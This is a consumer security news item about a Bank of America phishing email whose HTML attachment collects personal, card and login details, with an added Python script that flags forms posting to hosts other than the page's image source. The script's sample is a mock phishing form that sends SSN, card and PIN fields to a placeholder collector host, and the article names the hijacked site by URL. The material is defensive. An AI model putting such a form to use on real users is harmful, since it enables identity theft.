Bank of America customers should beware of fake emails that inform them of irregular activity detected on their account.
According to Stop Malvertising, the emails inform recipients that their bank account has been limited and that they must follow the steps in the attached file in order to regain full access to it.
The attached file is an HTML document that fetches information from the genuine Bank of America website and a hijacked site hosted at http://www.eetkroegmanu.be.
The form instructs victims to enter their name, contact information, date of birth, driver’s license number, social security number, mother’s maiden name, payment card information (including PIN), online ID, password to the account, and secret questions.
Images are retrieved from the BoA site, while the other website is used to host the stolen information. As you might have guessed, the information collected by the cybercriminals can be used for all sorts of malicious purposes, including identity theft.
If you come across such emails, delete them at once. If you’re a victim, change your passwords, contact your bank, and keep a close eye on your account.
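The attachment described above loads its images from the genuine bank site but sends the form data elsewhere, and that mismatch can be checked statically before anyone opens the file. The following is an added example, not code from Stop Malvertising or the original article: the host names in the sample, the keyword list, and the `triage` function are all constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic keyword list (an assumption of this example, not from the article).
SENSITIVE = ("ssn", "social", "pin", "passw", "card", "cvv", "maiden", "license", "dob")

# Constructed sample attachment; both hosts are placeholders.
SAMPLE = """<html><body>
<img src="https://www.bank.example/images/logo.gif">
<form method="post" action="http://collector.example/save.php">
<input type="text" name="fullname">
<input type="text" name="ssn">
<input type="text" name="card_number">
<input type="password" name="atm_pin">
<input type="submit" value="Continue">
</form></body></html>"""

class AttachmentScan(HTMLParser):
    def __init__(self):
        super().__init__()
        self.resource_hosts, self.form_hosts, self.sensitive = set(), set(), []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in ("img", "link", "script"):
            # Hosts the page borrows its look from (logos, styles, scripts).
            host = urlparse(a.get("src") or a.get("href") or "").hostname
            if host:
                self.resource_hosts.add(host)
        elif tag == "form":
            # Host that receives whatever the user types.
            host = urlparse(a.get("action", "")).hostname
            if host:
                self.form_hosts.add(host)
        elif tag in ("input", "select", "textarea"):
            name = (a.get("name") or a.get("id") or "").lower()
            if a.get("type", "").lower() == "password" or any(s in name for s in SENSITIVE):
                self.sensitive.append(name)

def triage(html):
    scan = AttachmentScan()
    scan.feed(html)
    # Form targets that are not among the hosts supplying the page's resources.
    off_brand = sorted(scan.form_hosts - scan.resource_hosts)
    return {"resource_hosts": sorted(scan.resource_hosts),
            "off_brand_form_hosts": off_brand,
            "sensitive_fields": scan.sensitive,
            "suspicious": bool(off_brand and scan.sensitive)}

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A form that posts to the same host its images come from is not flagged, so the check is a triage signal for mail gateways or analysts rather than a verdict on its own.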